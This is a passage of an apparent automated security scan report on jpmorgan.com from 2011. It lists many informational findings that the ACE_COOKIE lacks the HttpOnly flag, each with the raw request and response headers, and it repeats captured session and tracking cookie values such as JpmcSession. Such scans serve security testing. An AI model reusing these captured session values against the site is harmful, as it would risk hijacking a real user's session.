Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:29 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 13:59:06 GMT
Accept-Ranges: bytes
Content-Length: 2343
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C....... .. ..........................................................>.>.."..............................
...[SNIP]...

11.267. http://www.jpmorgan.com/images/thumb_pb_62.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/thumb_pb_62.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thumb_pb_62.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:29 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 13:59:40 GMT
Accept-Ranges: bytes
Content-Length: 2093
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C....... .. ..........................................................>.>.."..............................
...[SNIP]...

11.268. http://www.jpmorgan.com/images/thumb_ts_62.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/thumb_ts_62.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thumb_ts_62.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:29 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 13:59:50 GMT
Accept-Ranges: bytes
Content-Length: 1901
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C....... .. ..........................................................>.>.."..............................
...[SNIP]...

11.269. http://www.jpmorgan.com/images/thumb_wss_62.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/thumb_wss_62.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thumb_wss_62.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:29 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 14:00:30 GMT
Accept-Ranges: bytes
Content-Length: 2395
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C....... .. ..........................................................>.>.."..............................
...[SNIP]...

11.270. http://www.jpmorgan.com/images/ts/images_2008/background_subpage.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/ts/images_2008/background_subpage.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ts/images_2008/background_subpage.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:01 GMT
Server: Apache
Last-Modified: Thu, 31 Jul 2008 16:22:28 GMT
Accept-Ranges: bytes
Content-Length: 8476
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......Z......Adobe.d.................................................................................................................................................f.b..
...[SNIP]...

11.271. http://www.jpmorgan.com/images/ts/images_2008/footer_pixel.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/ts/images_2008/footer_pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ts/images_2008/footer_pixel.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:04 GMT
Server: Apache
Last-Modified: Mon, 18 Aug 2008 21:47:12 GMT
Accept-Ranges: bytes
Content-Length: 263
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a..'...............................................................................................................................................................................................
...[SNIP]...

11.272. http://www.jpmorgan.com/images/ts/images_2008/logo_jpm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/ts/images_2008/logo_jpm.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ts/images_2008/logo_jpm.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:01 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT
Accept-Ranges: bytes
Content-Length: 2153
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a..)..........H4)k[R.........yjc.xqVC9:#.?).;%....='.<&.!.......,......)....PI&.b8..k~Y(> &....l...G.4v.V..|O..[0...;..r.....(.`80Z$..Pca.R..{..47...^..?....x...26.B.b....zJ.(XYLV|}.L) 3}o7pGxlfW
...[SNIP]...

11.273. http://www.jpmorgan.com/images/ts/images_2008/navbar_map.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/ts/images_2008/navbar_map.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ts/images_2008/navbar_map.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:04 GMT
Server: Apache
Last-Modified: Thu, 17 Jul 2008 22:14:32 GMT
Accept-Ranges: bytes
Content-Length: 243
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a+.......yi..x...xk^.........e]]!.......,....+......x...0.I..8..3P..u...Fj.S0.....$.cE.......P.)x..q)(.r...P....FS..NU.C............4...u..xj..f.
?(`TP.].}..1.hSh.\F.7\M.Rq...o...;.,..ga...3c.).,
...[SNIP]...

11.274. http://www.jpmorgan.com/images/ts/images_2008/scnd_body_arrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/ts/images_2008/scnd_body_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ts/images_2008/scnd_body_arrow.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:04 GMT
Server: Apache
Last-Modified: Tue, 12 Aug 2008 21:51:22 GMT
Accept-Ranges: bytes
Content-Length: 160
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.. ...........................3..#....................M..?.............................................!.......,...... .... .....p0...O3..c./..H....P...;

11.275. http://www.jpmorgan.com/images/ts/images_2008/scnd_menu_tab.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/ts/images_2008/scnd_menu_tab.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ts/images_2008/scnd_menu_tab.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:02 GMT
Server: Apache
Last-Modified: Thu, 31 Jul 2008 18:24:18 GMT
Accept-Ranges: bytes
Content-Length: 791
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......Z......Adobe.d.................................................................................................................................................#....
...[SNIP]...

11.276. http://www.jpmorgan.com/images/ts/images_2008/scnd_menu_tab_left.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/ts/images_2008/scnd_menu_tab_left.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ts/images_2008/scnd_menu_tab_left.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:02 GMT
Server: Apache
Last-Modified: Fri, 18 Jul 2008 20:51:28 GMT
Accept-Ranges: bytes
Content-Length: 362
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

.............................................................#....
...[SNIP]...

11.277. http://www.jpmorgan.com/images/ts/images_2008/scnd_onstate_arrow.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/ts/images_2008/scnd_onstate_arrow.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ts/images_2008/scnd_onstate_arrow.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:02 GMT
Server: Apache
Last-Modified: Wed, 23 Jul 2008 16:31:50 GMT
Accept-Ranges: bytes
Content-Length: 754
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....,.,.....C......................
.....
...
.................................C....... .. ..........................................................!...."..............................
...[SNIP]...

11.278. http://www.jpmorgan.com/images/ts/images_2008/scnd_tab_bar_pixel.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/ts/images_2008/scnd_tab_bar_pixel.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ts/images_2008/scnd_tab_bar_pixel.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:02 GMT
Server: Apache
Last-Modified: Fri, 18 Jul 2008 20:51:28 GMT
Accept-Ranges: bytes
Content-Length: 333
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

.............................................................!....
...[SNIP]...

11.279. http://www.jpmorgan.com/images/ts/images_2008/thrd_client_tab_left2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/ts/images_2008/thrd_client_tab_left2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ts/images_2008/thrd_client_tab_left2.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:01 GMT
Server: Apache
Last-Modified: Fri, 12 Dec 2008 18:24:19 GMT
Accept-Ranges: bytes
Content-Length: 954
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......Z......Adobe.d......................................................................................................................................................
...[SNIP]...

11.280. http://www.jpmorgan.com/images/ts/images_2008/thrd_client_tab_right2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/ts/images_2008/thrd_client_tab_right2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ts/images_2008/thrd_client_tab_right2.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.4.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:01 GMT
Server: Apache
Last-Modified: Fri, 12 Dec 2008 18:24:19 GMT
Accept-Ranges: bytes
Content-Length: 939
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......Z......Adobe.d......................................................................................................................................................
...[SNIP]...

11.281. http://www.jpmorgan.com/images/ts/images_2008/thrd_subnav_arrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/images/ts/images_2008/thrd_subnav_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ts/images_2008/thrd_subnav_arrow.gif HTTP/1.1
